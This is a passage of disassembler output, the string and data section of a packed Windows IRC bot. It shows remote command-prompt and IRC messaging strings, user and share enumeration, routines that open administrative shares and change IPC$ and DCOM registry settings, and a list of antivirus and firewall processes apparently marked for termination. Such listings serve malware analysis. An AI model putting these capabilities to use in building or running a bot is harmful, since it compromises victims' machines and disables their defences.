- %s',0 align 4 a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_418C8F+D0o align 10h aNo db 'No',0 ; DATA XREF: sub_418C8F+BCo align 4 aYes db 'Yes',0 ; DATA XREF: sub_418C8F+B5o unk_439788 db 2Dh ; - ; DATA XREF: sub_418C8F+76o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aShareListError db '- share list error %s <%ld>',0 align 10h aShareNameResou db 'Share name: Resource: Uses: Desc:',0 ; DATA XREF: sub_418C8F+26o align 4 unk_4397E8 db 2Dh ; - ; DATA XREF: sub_418DB0+B7o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSNoUsernameSpe db '- %s: no username specified',0 align 10h unk_439810 db 2Dh ; - ; DATA XREF: sub_418DB0+95o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0 align 10h unk_439840 db 2Dh ; - ; DATA XREF: sub_418DB0+6Do db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSUsernameS db '- %s username: ',27h,'%s',27h,0 align 10h unk_439860 db 2Dh ; - ; DATA XREF: sub_418EF7+3AFo db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aUserInfoErrorL db '- user info error <%ld>',0 align 4 aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_418EF7+385o align 4 aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_418EF7+35Ao align 4 aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_418EF7+32Fo aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_418EF7+304o align 4 aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_418EF7+2D9o align 4 aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_418EF7+2AEo align 4 aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_418EF7+283o aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_418EF7+258o align 4 aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_418EF7+22Do align 4 aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_418EF7+202o align 4 aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_418EF7+1D7o align 10h aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_418EF7+1ACo align 10h aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_418EF7+181o align 4 aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_418EF7+156o align 4 aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_418EF7+12Bo aGuest db 'Guest',0 ; DATA XREF: sub_418EF7:loc_419016o align 10h aUser_2 db 'User',0 ; DATA XREF: sub_418EF7:loc_41900Fo align 4 aAdministrator db 'Administrator',0 ; DATA XREF: sub_418EF7:loc_419008o align 4 aCommentS db 'Comment: %S',0 ; DATA XREF: sub_418EF7+DAo aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_418EF7+AFo align 4 aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_418EF7+84o align 4 aAccountS db 'Account: %S',0 ; DATA XREF: sub_418EF7+50o aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_4192E0+14Fo align 4 unk_439A1C db 2Dh ; - ; DATA XREF: sub_4192E0+F7o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aAnAccessViolat db '- an access violation has occured',0 align 4 aS_4 db ' %S',0 ; DATA XREF: sub_4192E0+BEo align 10h unk_439A50 db 2Dh ; - ; DATA XREF: sub_4192E0+7Ao db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aUserListErrorS db '- user list error %s <%ld>',0 aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_4192E0+29o aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_419460:loc_41957Do align 4 aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_419460:loc_419576o align 4 aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_419460:loc_41956Fo align 10h aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_419460:loc_419568o align 10h aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_419460:loc_419561o align 4 aThePasswordIsS db 'The password is shorter than required (or does not meet the passw' ; DATA XREF: sub_419460:loc_419544o db 'ord policy requirement.)',0 align 4 aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_419460:loc_41953Do align 4 aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_419460:loc_419536o align 4 aTheOperationIs db 'The operation is allowed only on the primary domain controller of' ; DATA XREF: sub_419460+CFo db ' the domain.',0 align 4 aAGeneralFailur db 'A general failure occurred in the network hardware.',0 ; DATA XREF: sub_419460:loc_41950Bo aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_419460:loc_419504o aDeviceOrDirect db 'Device or directory does not exist.',0 ; DATA XREF: sub_419460:loc_4194FDo aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_419460:loc_4194F3o align 10h aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_419460+89o align 4 aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_419460:loc_4194CDo align 10h aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_419460:loc_4194C3o align 10h aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_419460:loc_4194B9o align 4 aThisNetworkReq db 'This network request is not supported.',0 ; DATA XREF: sub_419460:loc_4194AFo align 4 aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_419460:loc_4194A5o align 4 aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_419460+3Bo align 4 dword_439D58 dd 234032Dh, 274656Eh, 25202D03h, 34032073h, 76726553h ; DATA XREF: sub_419594+ABo dd 3A037265h, 20532520h, 654D3403h, 67617373h, 203A0365h dd 5325h unk_439D84 db 2Dh ; - ; DATA XREF: sub_419594+81o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 dd 6D202D03h, 61737365h, 73206567h, 20746E65h, 63637573h dd 66737365h, 796C6C75h db 0 align 4 dword_439DAC dd 7530h ; DATA XREF: sub_419A01+12r off_439DB0 dd offset aRegedit_exe ; DATA XREF: sub_4196BD+CBo ; "regedit.exe" dd offset aMsconfig_exe ; "msconfig.exe" dd offset aNetstat_exe ; "netstat.exe" dd offset aMsblast_exe ; "msblast.exe" dd offset aZapro_exe ; "zapro.exe" dd offset aNavw32_exe ; "navw32.exe" dd offset aNavapw32_exe ; "navapw32.exe" dd offset aZonealarm_exe ; "zonealarm.exe" dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe" dd offset aPandaavengine_ ; "PandaAVEngine.exe" dd offset dword_439EB8 dd offset dword_439EAC dd offset dword_439EA0 dd offset dword_439E94 dd offset dword_439E88 dd offset dword_439E7C dd offset dword_439E6C dd offset dword_439E60 dd offset dword_439E54 dd offset dword_439E48 dd offset dword_439E3C dd offset dword_439E2C dd offset dword_439E20 dd offset dword_439E10 dword_439E10 dd 72313169h, 346E3435h, 6578652Eh, 0 ; DATA XREF: sub_4196BD+ECo ; UPX0:00439E0Co dword_439E20 dd 6E757269h, 78652E34h, 65h ; DATA XREF: UPX0:00439E08o dword_439E2C dd 75643364h, 74616470h, 78652E65h, 65h ; DATA XREF: UPX0:00439E04o dword_439E3C dd 65746172h, 6578652Eh, 0 ; DATA XREF: UPX0:00439E00o dword_439E48 dd 74617373h, 78652E65h, 65h ; DATA XREF: UPX0:00439DFCo dword_439E54 dd 736E6977h, 652E7379h, 6578h ; DATA XREF: UPX0:00439DF8o dword_439E60 dd 756E6977h, 652E6470h, 6578h ; DATA XREF: UPX0:00439DF4o dword_439E6C dd 4D737953h, 50586E6Fh, 6578652Eh, 0 ; DATA XREF: UPX0:00439DF0o dword_439E7C dd 61656262h, 2E656C67h, 657865h ; DATA XREF: UPX0:00439DECo dword_439E88 dd 696E6550h, 2E323373h, 657865h ; DATA XREF: UPX0:00439DE8o dword_439E94 dd 6B656574h, 2E736469h, 657865h ; DATA XREF: UPX0:00439DE4o dword_439EA0 dd 4C42534Dh, 2E545341h, 657865h ; DATA XREF: UPX0:00439DE0o dword_439EAC dd 7663736Dh, 2E323362h, 657865h ; DATA XREF: UPX0:00439DDCo dword_439EB8 dd 69737973h, 2E6F666Eh, 657865h ; DATA XREF: UPX0:00439DD8o aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: UPX0:00439DD4o align 4 aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: UPX0:00439DD0o aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: UPX0:00439DCCo align 10h aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: UPX0:00439DC8o align 10h aNavw32_exe db 'navw32.exe',0 ; DATA XREF: UPX0:00439DC4o align 4 aZapro_exe db 'zapro.exe',0 ; DATA XREF: UPX0:00439DC0o align 4 aMsblast_exe db 'msblast.exe',0 ; DATA XREF: UPX0:00439DBCo aNetstat_exe db 'netstat.exe',0 ; DATA XREF: UPX0:00439DB8o aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: UPX0:00439DB4o align 10h aRegedit_exe db 'regedit.exe',0 ; DATA XREF: UPX0:off_439DB0o aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4196BD+191o align 4 unk_439F68 db 2Dh ; - ; DATA XREF: sub_4198EC:loc_419973o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aProcessListFai db ' process list failed',0 align 4 unk_439F8C db 2Dh ; - ; DATA XREF: sub_4198EC+80o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aProcessListCom db ' process list complete',0 align 10h unk_439FB0 db 2Dh ; - ; DATA XREF: sub_4198EC+19o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aListingProcess db ' listing processes:',0 aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_419A89+33o unk_439FE0 db 2Dh ; - ; DATA XREF: sub_419B10:loc_419C42o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0 unk_43A010 db 2Dh ; - ; DATA XREF: sub_419B10+10Fo db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0 align 4 unk_43A038 db 2Dh ; - ; DATA XREF: sub_419B10:loc_419BF6o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0 align 4 unk_43A068 db 2Dh ; - ; DATA XREF: sub_419C65+194o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0 align 4 unk_43A09C db 2Dh ; - ; DATA XREF: sub_419C65+14Co db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aRemoteCommandP db '- Remote Command Prompt',0 align 10h off_43A0C0 dd offset dword_43A0F8 ; DATA XREF: sub_419E7A+1B3o ; sub_41A19E+17Ao align 8 dd offset dword_43A0F0 align 10h off_43A0D0 dd offset dword_43A0EC ; DATA XREF: sub_41A19E+1E3o dd offset dword_43A0E8 dd offset dword_43A0E4 dd offset dword_43A0E0 dword_43A0E0 dd 5C3A44h ; DATA XREF: sub_419E7A+217o ; UPX0:0043A0DCo dword_43A0E4 dd 2444h ; DATA XREF: UPX0:0043A0D8o dword_43A0E8 dd 5C3A43h ; DATA XREF: UPX0:0043A0D4o dword_43A0EC dd 2443h ; DATA XREF: UPX0:off_43A0D0o dword_43A0F0 dd 494D4441h, 244Eh ; DATA XREF: UPX0:0043A0C8o dword_43A0F8 dd 24435049h, 0 ; DATA XREF: UPX0:off_43A0C0o dword_43A100 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+2E5o ; sub_41A19E+2DBo aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0 align 10h dword_43A130 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+2CFo aNetworkSharesD db '- Network shares deleted.',0 align 4 dword_43A158 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_41A0DCo aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0 align 4 dword_43A184 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+25Bo aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0 align 4 dword_43A1A8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_41A049o aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0 align 4 dword_43A1D4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+1C8o aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0 align 4 dword_43A1F8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419FACo ; sub_41A19E:loc_41A2CCo aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0 align 4 dword_43A228 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419FA5o aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0 dword_43A264 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419F87o aRestrictedAcce db '- Restricted access to the IPC$ Share.',0 align 4 dword_43A298 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+106o aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0 align 4 aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_419E7A+EDo ; sub_41A19E+EDo align 4 dword_43A2E8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+91o ; sub_41A19E+91o aFailedToOpenDc db '- Failed to open DCOM registry key.',0 dword_43A318 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 64204D4Fh ; DATA XREF: sub_419E7A:loc_419EE7o dd 62617369h, 2E64656Ch, 0 dword_43A338 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+66o aDisableDcomFai db '- Disable DCOM failed.',0 align 4 aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_419E7A+54o ; sub_41A19E+54o align 4 dword_43A368 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+2C3o aNetworkSharesA db '- Network shares added.',0 aC_0 db '%c:\',0 ; DATA XREF: sub_41A19E+230o align 4 aC_1 db '%c$',0 ; DATA XREF: sub_41A19E+219o dword_43A398 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A33Do ; sub_41A19E:loc_41A40Eo aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0 dword_43A3C0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+198o ; sub_41A19E+269o aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0 dword_43A3E0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A2C5o aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0 dword_43A41C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A2A7o aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0 align 4 dword_43A454 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+102o aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0 align 4 dword_43A494 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 65204D4Fh ; DATA XREF: sub_41A19E:loc_41A20Bo dd 6C62616Eh, 2E6465h dword_43A4B0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+66o aEnableDcomFail db '- Enable DCOM failed.',0 align 4 aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41A4D2+E1o db 'Host: %s',0Dh,0Ah db 'Content-Length: %d',0Dh,0Ah db 0Dh,0Ah,0 align 4 dword_43A508 dd 234032Dh, 65657073h, 73657464h, 2D030274h, 75450220h ; DATA XREF: sub_41A6AF+1A7o dd 65706F72h, 25203A02h, 626B2064h, 732F7469h, 53550220h dd 203A0241h, 6B206425h, 2F746962h, 41022073h, 2616973h dd 6425203Ah, 69626B20h, 20732F74h, 65764102h, 65676172h dd 25203A02h, 626B2064h, 732F7469h, 0 aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41A6AF+C4o align 4 aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41A6AF+BDo aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41A6AF+B6o align 4 aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41A6AF+AFo align 4 aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41A6AF+A8o align 10h aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41A6AF+A1o aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41A6AF+9Ao align 4 aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41A6AF+93o align 4 aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41A6AF+8Co align 4 aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41A6AF+85o align 4 aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41A6AF+7Eo align 4 aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41A6AF+77o align 4 aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41A6AF+70o align 4 aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41A6AF+69o aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41A6AF+62o aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41A6AF+5Bo align 4 aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41A6AF+54o align 4 aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41A6AF+4Do align 4 aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41A6AF+46o align 4 aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41A6AF+3Fo align 4 aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41A6AF+38o align 4 aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41A6AF+31o align 4 aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41A6AF+2Ao align 4 aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41A6AF+23o align 4 aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41A6AF+1Co align 4 aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41A6AF+15o aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41A88C+52o dword_43A720 dd 234032Dh, 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah ; DATA XREF: sub_41AA43+297o dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h dd 74705502h, 2656D69h, 7325203Ah, 2Eh dword_43A7FC dd 4D3A6464h, 793A4D4Dh, 797979h ; DATA XREF: sub_41AA43+192o aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41AA43:loc_41ABA7o align 10h aSS_2 db '%s (%s)',0 ; DATA XREF: sub_41AA43+EBo dword_43A828 dd 234032Dh, 6974656Eh, 26F666Eh, 2202D03h, 65707954h ; DATA XREF: sub_41ACF7+A4o dd 25203A02h, 25282073h, 202E2973h, 20504902h, 72646441h dd 2737365h, 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h dd 7325203Ah, 2Eh off_43A86C dd offset loc_412F4E ; DATA XREF: sub_41ACF7:loc_41AD63o dword_43A870 dd 4E414Ch ; DATA XREF: sub_41ACF7:loc_41AD59o dword_43A874 dd 6C616944h, 70752Dh ; DATA XREF: sub_41ACF7+5Bo dword_43A87C dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_41ACF7+48o unk_43A88C db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF6Fo db 3, 34h, 2 db 76h ; v db 69h, 73h, 69h db 74h ; t db 2, 3, 2Dh aFailedToConnec db ' Failed to connect to HTTP server.',0 align 4 unk_43A8BC db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF68o db 3, 34h, 2 db 76h ; v db 69h, 73h, 69h db 74h ; t db 2, 3, 2Dh aCouldNotOpenAC db ' Could not open a connection.',0 align 4 dword_43A8E8 dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h ; DATA XREF: sub_41ADB6+1A0o dd 4C525520h, 2Eh unk_43A904 db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF49o db 3, 34h, 2 db 76h ; v db 69h, 73h, 69h db 74h ; t db 2, 3, 2Dh aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0 align 10h dword_43A940 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h ; DATA XREF: sub_41ADB6+18Co dd 64657469h, 2Eh dword_43A95C dd 2A2F2Ah ; DATA XREF: sub_41ADB6+3Bo dword_43A960 dd 276F8229h ; DATA XREF: sub_41B8D8+4w sub_41B8E2r ... align 10h dword_43A970 dd 173Fh ; DATA XREF: sub_41C679+Dr dd 9875h, 9873h off_43A97C dd offset sub_41C748 ; DATA XREF: sub_41B784r dd offset nullsub_2 dd offset nullsub_2 dword_43A988 dd 1B3Fh ; DATA XREF: sub_41C7BF+Dr dword_43A98C dd 19930520h, 4 dup(0) ; DATA XREF: sub_41CC41+2o ; sub_41CC4A+2o off_43A9A0 dd offset sub_41B7C2 ; DATA XREF: sub_41DA29+1Cr dword_43A9A4 dd 2 ; DATA XREF: sub_423590+Er ; sub_4235C9+46r ... dd 10h, 0 off_43A9B0 dd offset off_43A9B0 ; DATA XREF: sub_41E976+Do ; sub_41E976+69o ... off_43A9B4 dd offset off_43A9B0 ; DATA XREF: sub_41E976:loc_41E9F6r ; sub_41E976+89w ... dd offset dword_43A9C8 dd offset dword_43A9C8 dword_43A9C0 dd 0FFFFFFFFh ; DATA XREF: sub_41E976r ; sub_41EABA:loc_41EB07w dd 0FFFFFFFFh dword_43A9C8 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: UPX0:0043A9B8o ; UPX0:0043A9BCo off_43C9D0 dd offset off_43A9B0 ; DATA XREF: sub_41EABA+15r ; sub_41EABA+20w ... dword_43C9D4 dd 1E0h ; DATA XREF: sub_41B202+185r ; sub_41B513:loc_41B54Fr ... off_43C9D8 dd offset word_43C9E2 ; DATA XREF: sub_41B6EE+23r ; sub_41B6EE:loc_41B74Fr ... off_43C9DC dd offset word_43C9E2 ; DATA XREF: sub_426BC1+18r db 2 dup(0) word_43C9E2 dw 20h ; DATA XREF: sub_424D47+18r ; UPX0:off_43C9D8o ... unicode 0, < ((((( H> dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h) dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h) dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0) dword_43CBE4 dd 1 ; DATA XREF: sub_41B6EE:loc_41B6F6r ; sub_41B6EE:loc_41B73Ar ... byte_43CBE8 db 2Eh ; DATA XREF: sub_420510:loc_420804r ; sub_420510+311r ... align 4 dd 1 off_43CBF0 dd offset aNull_0 ; DATA XREF: sub_41F69F:loc_41FA03r ; sub_41F69F+457r ; "(null)" off_43CBF4 dd offset aNull ; DATA XREF: sub_41F69F+259r ; "(null)" byte_43CBF8 db 1 ; DATA XREF: sub_41FEA9+E1r db 2, 4, 8 align 10h dword_43CC00 dd 3A4h ; DATA XREF: sub_41FEA9+2Fo dword_43CC04 dd 82798260h, 21h, 0 ; DATA XREF: sub_41FEA9+11Dr dword_43CC10 dd 0DFA6h ; DATA XREF: sub_41FEA9+C0r align 8 dd 0A5A1h, 0 dd 0FCE09F81h, 0 dd 0FC807E40h, 0 dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0) dd 0FE81h, 0 dd 0FE40h, 0 dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0) dd 0FE81h, 0 dd 0FE41h, 0 dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0) dd 0FE81h, 0 dd 0FEA17E40h, 0 dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0) dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0 dword_43CCF0 dd 1 ; DATA XREF: sub_41FEA9+3Co ; sub_4203DF+Co dword_43CCF4 dd 16h ; DATA XREF: sub_4203DF:loc_420414r dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2 dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch dword_43CE58 dd 0D2D0920h, 5Dh ; DATA XREF: sub_4203DF+19o ; sub_420510:loc_420A77o dword_43CE60 dd 5Dh, 0 ; DATA XREF: sub_420510:loc_420967o dword_43CE68 dd 14h ; DATA XREF: sub_421624+2o off_43CE6C dd offset aExp ; DATA XREF: sub_421624:loc_421641r ; "exp" dd 1Dh, 427870h, 1Ah, 42C964h, 1Bh, 427868h, 1Fh, 427860h dd 13h, 427858h, 21h, 427850h, 0Eh, 427848h, 0Dh, 427840h dd 0Fh, 427838h, 10h, 427830h, 5, 427828h, 1Eh, 427824h dd 12h, 427820h, 20h, 42781Ch, 0Ch, 427814h, 0Bh, 42780Ch dd 15h, 427804h, 1Ch, 4277FCh, 19h, 4277F4h, 11h, 4277ECh dd 18h, 4277E4h, 16h, 4277DCh, 17h, 4277D4h, 22h, 4277D0h dd 23h, 4277CCh, 24h, 4277C8h dbl_43CF40 dq 1.797693134862316e308 ; DATA XREF: sub_42135F+B7r ; sub_42135F:loc_421446r ... dd 0 dd 0FFF80000h dbl_43CF50 dq 1.797693134862316e308 ; DATA XREF: sub_42135F+92r ; sub_42135F:loc_42141Er ... dd 0 dd 100000h, 0 dd 80000000h tbyte_43CF68 dt 2.3562723457267347066e313 ; DATA XREF: sub_42180C+Dr ; sub_42180C+1Fr align 4 tbyte_43CF74 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_42180C+31r align 10h off_43CF80 dd offset sub_421CA0 ; DATA XREF: sub_41C760+Fw ; sub_41F69F+3AAr off_43CF84 dd offset sub_421935 ; DATA XREF: sub_41C760+5w ; sub_41F69F+3E2r off_43CF88 dd offset sub_42199B ; DATA XREF: sub_41C760+14w ; sub_420510+430r off_43CF8C dd offset sub_4218DB ; DATA XREF: sub_41C760+1Ew ; sub_41F69F+3CBr off_43CF90 dd offset sub_421983 ; DATA XREF: sub_41C760+28w off_43CF94 dd offset sub_421CA0 ; DATA XREF: sub_41C760+32w dd offset sub_42470C align 10h dd offset sub_42255C off_43CFA4 dd offset sub_42255C ; DATA XREF: sub_4225B2+29r dword_43CFA8 dd 0C0000005h ; DATA XREF: sub_422E2F+Ar ; sub_422E2F+11o ... dword_43CFAC dd 0Bh ; DATA XREF: sub_425A82+Ar dd 0 dd 0C000001Dh, 4, 0 dd 0C0000096h, 4, 0 db 8Dh, 0 dw 0C000h dd 8, 0 dd 0C000008Eh, 8, 0 dd 0C000008Fh, 8, 0 db 90h db 2 dup(0), 0C0h dd 8, 0 dd 0C0000091h, 8, 0 dd 0C0000092h, 8, 0 dd 0C0000093h, 8, 0 dword_43D020 dd 3 ; DATA XREF: sub_422CEE+58r ; sub_425955+C8r dword_43D024 dd 7 ; DATA XREF: sub_422CEE+5Er ; sub_425955+CDr dword_43D028 dd 0Ah ; DATA XREF: sub_422E2F+4r ; sub_425A82+4r dword_43D02C dd 8Ch ; DATA XREF: sub_422CEE+82r ; sub_422CEE+8Fw ... dword_43D030 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_41F043:loc_41F0C4o ; sub_41F58A:loc_41F647o dword_43D038 dd 2 ; 